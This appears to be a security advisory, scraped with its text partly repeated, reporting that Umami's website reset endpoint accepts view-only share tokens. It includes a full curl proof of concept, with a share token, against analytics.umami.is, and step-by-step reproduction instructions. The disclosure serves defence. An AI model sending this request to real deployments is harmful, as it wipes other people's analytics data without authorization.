Summary
Anyone with a share link (permissions to view) can reset the website data.
Details
When a user navigates to a /share/
URL, he receives a share token which is used for authentication. This token is later verified by useAuth
. After the token is verified, the user can call most of the GET
APIs that allow fetching stats about a website.
The POST /reset
endpoint is secured using canViewWebsite
which is the incorrect verification for such destructive action. This makes it possible to completly reset all website data ONLY with view permissions - permalink
PoC
curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
-H 'authority: analytics.umami.is' \
-H 'accept: application/json' \
-H 'accept-language: en-US,en;q=0.9' \
-H 'authorization: Bearer undefined' \
-H 'cache-control: no-cache' \
-H 'content-type: application/json' \
-H 'pragma: no-cache' \
-H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
-H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Linux"' \
-H 'sec-fetch-dest: empty' \
-H 'sec-fetch-mode: cors' \
-H 'sec-fetch-site: same-origin' \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
-H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
--compressed
You can reproduce this by:
- Accessing a website using it's share link
- Copy the
token
received from the the received from the GET /share/{website-id}
- Send a POST request to
https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset
with x-umami-share-token:
header equal to the token copied in the previous step
- The website data is now cleared
Impact
Everyone with an open share link exposed to the internet!
Summary
Anyone with a share link (permissions to view) can reset the website data.
Details
When a user navigates to a
/share/
URL, he receives a share token which is used for authentication. This token is later verified byuseAuth
. After the token is verified, the user can call most of theGET
APIs that allow fetching stats about a website.The
POST /reset
endpoint is secured usingcanViewWebsite
which is the incorrect verification for such destructive action. This makes it possible to completly reset all website data ONLY with view permissions - permalinkPoC
You can reproduce this by:
token
received from the the received from theGET /share/{website-id}
https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset
withx-umami-share-token:
header equal to the token copied in the previous stepImpact
Everyone with an open share link exposed to the internet!